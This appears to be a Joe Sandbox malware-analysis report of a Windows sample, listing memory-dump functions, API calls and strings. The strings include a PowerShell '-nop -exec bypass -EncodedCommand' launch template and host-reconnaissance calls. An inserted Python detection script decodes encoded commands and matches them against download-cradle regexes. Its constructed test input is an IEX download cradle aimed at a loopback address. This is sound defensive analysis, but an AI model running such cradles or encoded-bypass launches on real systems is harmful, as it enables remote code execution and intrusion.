                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                        • String ID:
                        • API String ID: 2464146582-0
                        • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                        • Instruction ID: 0ded6cc8c597b3455c857abea55a25717ee9779ccf9e874cae11be9dadb8988f
                        • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                        • Instruction Fuzzy Hash: 3C113432B0864046E716AF69DD4133D7A61EB80BA2F5A4219EA2D0B3D2CB7CC891C735
                        APIs
                        • _errno.LIBCMT ref: 00A57033
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A5702B
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A57077
                        • _lseeki64_nolock.LIBCMT ref: 00A57090
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                        • String ID:
                        • API String ID: 4140391395-0
                        • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                        • Instruction ID: 24869f5e2ced5ac64dda4e79e3574f09e8d9d298c5661dcf36be5b6aea1146e2
                        • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                        • Instruction Fuzzy Hash: BB11E43271465045EB026F25ED4233DBAA1B780BB3F598719EE392B3D5CB7C8489C721
                        APIs
                        • _errno.LIBCMT ref: 00A56EBB
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A56EB3
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A56EFF
                        • _lseek_nolock.LIBCMT ref: 00A56F18
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                        • String ID:
                        • API String ID: 310312816-0
                        • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                        • Instruction ID: 442e4f7fff8d8ef21560a802fcf992c23a57882ba40ccd5a181407ff39950d5c
                        • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                        • Instruction Fuzzy Hash: 3111E932B1064045E7156F65FE4133D7A61BB817A3F998219FE150B7D1CB78C84DC725
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                        • String ID:
                        • API String ID: 2927645455-0
                        • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                        • Instruction ID: 1124d590b50ed6eb51e77b3b53cafa6dd88f3e2bada55602f225d985db64a71b
                        • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                        • Instruction Fuzzy Hash: 2711043170074085D70AAFAD989537D6660EBC1B60F5D822DEB1E0B3D2CB78CC819776
                        APIs
                        • _errno.LIBCMT ref: 00D05C79
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D05C71
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D05CBD
                        • _close_nolock.LIBCMT ref: 00D05CD0
                        • _unlock_fhandle.LIBCMT ref: 00D05CE9
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                        • String ID:
                        • API String ID: 2140805544-0
                        • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                        • Instruction ID: 85241e1d8f8364f6d3ee1c0ddf4d46c29979b982b83eaf121402f382f3ca1da8
                        • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                        • Instruction Fuzzy Hash: 1A112C36610B8046E3056F69FC8532E6751EB80761F695625DE1E073D6C678C8418B38
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno
                        • String ID:
                        • API String ID: 2288870239-0
                        • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                        • Instruction ID: 8c94969ed53246c4cd76224494a75e79e99fc5f1e8cc0206fdb3ad647961121d
                        • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                        • Instruction Fuzzy Hash: 52315E2A715B4085FF19EF11ED9532863A0BFE6BA4F1C9239CD1E0A660DF2CC4448306
                        APIs
                        Strings
                        • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                        • Address %p has no image-section, xrefs: 00401DC0
                        • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                        • Mingw-w64 runtime failure:, xrefs: 00401D88
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: QueryVirtual
                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                        • API String ID: 1804819252-1534286854
                        • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                        • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                        • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                        • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                        APIs
                        • _mtinitlocknum.LIBCMT ref: 00D0A375
                          • Part of subcall function 00D03E58: _FF_MSGBANNER.LIBCMT ref: 00D03E75
                          • Part of subcall function 00D03E58: _NMSG_WRITE.LIBCMT ref: 00D03E7F
                        • _lock.LIBCMT ref: 00D0A388
                        • _lock.LIBCMT ref: 00D0A3E3
                        • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00D0A3F8
                        • EnterCriticalSection.KERNEL32 ref: 00D0A414
                        • LeaveCriticalSection.KERNEL32 ref: 00D0A424
                        • _calloc_crt.LIBCMT ref: 00D0A49A
                        • __lock_fhandle.LIBCMT ref: 00D0A502
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$_lock$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                        • String ID:
                        • API String ID: 854778215-0
                        • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                        • Instruction ID: 17a73f95e6c3af2d2e64be0cb4f258fe7064fd4c1610317dc9990aa5ada9d7e8
                        • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                        • Instruction Fuzzy Hash: DD51163661078082DB20DF29D84832DB7A9FB94B58F19421ADE8E477E0DFB8C951C732
                        APIs
                        • _errno.LIBCMT ref: 00A5585F
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A55857
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A558A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                        • String ID:
                        • API String ID: 2611593033-0
                        • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                        • Instruction ID: b19d6b682467631eb7fb2f72320e441ab8bb979c7b32ad3a8af2dac28c322962
                        • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                        • Instruction Fuzzy Hash: F9110632F14A8086D7016F76EE5133D7A60BB80BA3F594219EE251B3D2CB78C849D721
                        APIs
                        • _errno.LIBCMT ref: 00A55079
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A55071
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __lock_fhandle.LIBCMT ref: 00A550BD
                        • _close_nolock.LIBCMT ref: 00A550D0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                        • String ID:
                        • API String ID: 4060740672-0
                        • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                        • Instruction ID: 8d4196a13f9090bdf6bf6bd85bc76141a1fc3b011aae4e2275075dab77fc4416
                        • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                        • Instruction Fuzzy Hash: D2110A32B14E844AD7057F75EEA133D7A60BB817A3F594628DE1A073D2CB78C449C750
                        APIs
                        • malloc.LIBCMT ref: 00CE46A9
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CE46B3
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
                        • malloc.LIBCMT ref: 00CE46BE
                        • free.LIBCMT ref: 00CE487E
                        • free.LIBCMT ref: 00CE4886
                        • free.LIBCMT ref: 00CE488E
                          • Part of subcall function 00CE54F0: malloc.LIBCMT ref: 00CE553A
                          • Part of subcall function 00CE54F0: malloc.LIBCMT ref: 00CE5545
                          • Part of subcall function 00CE54F0: free.LIBCMT ref: 00CE562C
                          • Part of subcall function 00CE54F0: free.LIBCMT ref: 00CE5634
                        • free.LIBCMT ref: 00CE489A
                        • free.LIBCMT ref: 00CE48A7
                        • free.LIBCMT ref: 00CE48B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$malloc$_errno$_callnewh$AllocHeap
                        • String ID:
                        • API String ID: 3534990644-0
                        • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                        • Instruction ID: 4dbbf5242fa7d170c40167941c21135bf0a17d5bc717c29c60db988e0211a373
                        • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                        • Instruction Fuzzy Hash: 1A6104267047C886DF29DF679490B6E7751FB85BC8F404129DE4A87B85DF38CA06DB01
                        APIs
                        • malloc.LIBCMT ref: 00A33AA9
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A33AB3
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • malloc.LIBCMT ref: 00A33ABE
                        • free.LIBCMT ref: 00A33C7E
                        • free.LIBCMT ref: 00A33C86
                        • free.LIBCMT ref: 00A33C8E
                          • Part of subcall function 00A348F0: malloc.LIBCMT ref: 00A3493A
                          • Part of subcall function 00A348F0: malloc.LIBCMT ref: 00A34945
                          • Part of subcall function 00A348F0: free.LIBCMT ref: 00A34A2C
                          • Part of subcall function 00A348F0: free.LIBCMT ref: 00A34A34
                        • free.LIBCMT ref: 00A33C9A
                        • free.LIBCMT ref: 00A33CA7
                        • free.LIBCMT ref: 00A33CB4
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$malloc$_errno$_callnewh
                        • String ID:
                        • API String ID: 4160633307-0
                        • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                        • Instruction ID: cd8d9c9905f1bbdf9de05d8f059fc6d778249188424f7d995bddffc492a2a97b
                        • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                        • Instruction Fuzzy Hash: 4B61E2633087854ADF25EF26944076ABBA1FB95FC8F055125EE4A57B05EF38CA0ACB04
                        APIs
                          • Part of subcall function 00A453EC: malloc.LIBCMT ref: 00A45408
                        • malloc.LIBCMT ref: 00A3BF3B
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                          • Part of subcall function 00A4B630: _time64.LIBCMT ref: 00A4B654
                          • Part of subcall function 00A4B630: malloc.LIBCMT ref: 00A4B69C
                          • Part of subcall function 00A4B630: strtok.LIBCMT ref: 00A4B700
                          • Part of subcall function 00A4B630: strtok.LIBCMT ref: 00A4B711
                          • Part of subcall function 00A428A0: _time64.LIBCMT ref: 00A428AE
                          • Part of subcall function 00A4DEA8: malloc.LIBCMT ref: 00A4DEF8
                          • Part of subcall function 00A4DEA8: realloc.LIBCMT ref: 00A4DF07
                        • malloc.LIBCMT ref: 00A3C04A
                        • _snprintf.LIBCMT ref: 00A3C0C1
                        • _snprintf.LIBCMT ref: 00A3C0E7
                        • _snprintf.LIBCMT ref: 00A3C10E
                        • free.LIBCMT ref: 00A3C2C6
                          • Part of subcall function 00A4A144: malloc.LIBCMT ref: 00A4A178
                          • Part of subcall function 00A4A144: free.LIBCMT ref: 00A4A32F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                        • String ID: /'); %s
                        • API String ID: 1314452303-1283008465
                        • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                        • Instruction ID: 5e7449317982dc0819479dbbace587129f85368d9e7d90ec65bda18ef80d401e
                        • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                        • Instruction Fuzzy Hash: 71A1E32970178146DB14FBB2AA5676E7395FBD67D0F404124BE1A5B786DF3CC806C702
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                        • malloc.LIBCMT ref: 00CFB528
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CFEAA8: malloc.LIBCMT ref: 00CFEAF8
                        • GetComputerNameExA.KERNEL32 ref: 00CFB5EA
                        • GetComputerNameA.KERNEL32 ref: 00CFB61F
                        • GetUserNameA.ADVAPI32 ref: 00CFB654
                          • Part of subcall function 00CEF014: WSASocketA.WS2_32 ref: 00CEF042
                        • malloc.LIBCMT ref: 00CFB76D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                        • String ID: VUUU
                        • API String ID: 632458648-2040033107
                        • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                        • Instruction ID: c7b7d9b7a5552d40ea19b1f3f1bd6819707135bbe0a885ab53d55776cbea5899
                        • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                        • Instruction Fuzzy Hash: 2691262670069986DB84EB6AD8513BD2261FBC9BC4F908026EF495B756DF3CCE06D312
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf
                        • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                        • API String ID: 3512837008-1250630670
                        • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                        • Instruction ID: 9de1a824452a6af087b10af8f0c4376526e0f48e04b8c50bd17ce6c53c572c40
                        • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                        • Instruction Fuzzy Hash: 26718A36304B858AEB10DF61E9803E977B1F799B88F884626EA5D437A8DF3CC509C741
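                        Added example (not part of the Joe Sandbox report and not code from the sample): the record above carries the tail of a PowerShell launch template, -nop -exec bypass -EncodedCommand "%s", and the _snprintf records before it carry the /'); %s fragment that closes a download cradle. The Python below shows the check a responder would run over process-creation telemetry for that pattern: it decodes the UTF-16LE base64 argument of -EncodedCommand (and the parameter prefixes PowerShell accepts for it), then flags the -nop / -exec bypass / download-cradle combination. The command lines it runs on are constructed here (the loopback URL included), and the regexes and thresholds are this example's own assumptions, not anything the report asserts.

```python
"""Decode and triage PowerShell -EncodedCommand launch lines.

Example code for this report; the sample command lines are constructed,
not taken from the analysed binary or from Joe Sandbox output.
"""
import base64
import binascii
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# prefixes that show up in practice (assumption: list is illustrative, not exhaustive).
_ENC_RE = re.compile(
    r'(?<!\S)-(?:e|ec|en|enc|enco|encoded|encodedc|encodedcommand)\s+"?([A-Za-z0-9+/=]+)"?',
    re.IGNORECASE,
)
_BYPASS_RE = re.compile(r'(?<!\S)-(?:ex|exec|ep|executionpolicy)\s+bypass\b', re.IGNORECASE)
_NOPROFILE_RE = re.compile(r'(?<!\S)-nop(?:rofile)?\b', re.IGNORECASE)
# Download-cradle markers; the report's "/'); %s" fragment is the tail of such a cradle.
_CRADLE_RE = re.compile(
    r'downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b', re.IGNORECASE
)
_IEX_RE = re.compile(r'\biex\b|invoke-expression', re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None.

    PowerShell expects base64 over the UTF-16LE encoding of the script, so a
    blob that is not valid base64, or that decodes to an odd byte count, is
    rejected rather than guessed at.
    """
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode('utf-16-le')
    except UnicodeDecodeError:
        return None


def assess(cmdline: str) -> dict:
    """Flag the launch-template traits and the cradle inside the decoded body."""
    flags = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        flags.append('encoded_command')
    if _BYPASS_RE.search(cmdline):
        flags.append('exec_bypass')
    if _NOPROFILE_RE.search(cmdline):
        flags.append('noprofile')
    # The cradle normally lives in the encoded body, so inspect that when present.
    body = decoded if decoded is not None else cmdline
    if _CRADLE_RE.search(body) and _IEX_RE.search(body):
        flags.append('download_cradle')
    # Assumed verdict rule: encoded + bypass together, or any IEX download cradle.
    suspicious = {'encoded_command', 'exec_bypass'} <= set(flags) or 'download_cradle' in flags
    return {'decoded': decoded, 'flags': flags, 'verdict': 'suspicious' if suspicious else 'benign'}


def _enc(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


# Constructed inputs: a cradle on loopback, a benign profile-less call, and an unrelated process.
CONSTRUCTED_PAYLOAD = (
    "IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:4444/')); Invoke-Demo"
)
SAMPLE_CMDLINES = [
    f'powershell -nop -exec bypass -EncodedCommand "{_enc(CONSTRUCTED_PAYLOAD)}"',
    'powershell.exe -NoProfile -Command Get-Process',
    'notepad.exe C:\\Users\\Public\\notes.txt',
]

if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        result = assess(line)
        print(result['verdict'], result['flags'], (result['decoded'] or '')[:60])
```

The decoder deliberately refuses a body that is valid base64 but not valid UTF-16LE, since that is what PowerShell itself would reject; a hit on the first constructed line reports encoded_command, exec_bypass, noprofile and download_cradle together, while the -NoProfile administrative call alone stays benign.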
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                        • GetStartupInfoA.KERNEL32 ref: 00CF1540
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFE81
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFEA9
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF15CD
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF15DC
                        • CreateProcessWithLogonW.ADVAPI32 ref: 00CF1637
                        • GetLastError.KERNEL32 ref: 00CF1641
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                        • String ID: %s as %s\%s: %d
                        • API String ID: 3435635427-816037529
                        • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                        • Instruction ID: a2f506b8efdffa77f873e3e60696f10ee374d48fb40ce4d178d595009d7e6095
                        • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                        • Instruction Fuzzy Hash: 33515832204B8186DB60DF16B8407AEB7A5F789B80F548129EF8D83B29DF38D056CB00
                        APIs
                          • Part of subcall function 00A453EC: malloc.LIBCMT ref: 00A45408
                          • Part of subcall function 00A4FA20: _errno.LIBCMT ref: 00A4F977
                          • Part of subcall function 00A4FA20: _invalid_parameter_noinfo.LIBCMT ref: 00A4F982
                        • fseek.LIBCMT ref: 00A40B30
                          • Part of subcall function 00A502A4: _errno.LIBCMT ref: 00A502CC
                          • Part of subcall function 00A502A4: _invalid_parameter_noinfo.LIBCMT ref: 00A502D7
                        • _ftelli64.LIBCMT ref: 00A40B38
                          • Part of subcall function 00A50318: _errno.LIBCMT ref: 00A50336
                          • Part of subcall function 00A50318: _invalid_parameter_noinfo.LIBCMT ref: 00A50341
                        • fseek.LIBCMT ref: 00A40B48
                          • Part of subcall function 00A502A4: _fseek_nolock.LIBCMT ref: 00A502F5
                        • malloc.LIBCMT ref: 00A40B88
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                          • Part of subcall function 00A3C444: malloc.LIBCMT ref: 00A3C457
                        • fclose.LIBCMT ref: 00A40C45
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                        • String ID: mode
                        • API String ID: 1756087678-2976727214
                        • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                        • Instruction ID: 5792545f95e4b8d1fe99ad970e120a4711b1396ba82296db59d93f6b7611c43a
                        • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                        • Instruction Fuzzy Hash: 1841122630468082DB44EB22E96576EB352F7C9BD0F808225FE5E4BB96DF3CC505CB01
                        APIs
                        • malloc.LIBCMT ref: 00A4864F
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • _snprintf.LIBCMT ref: 00A48667
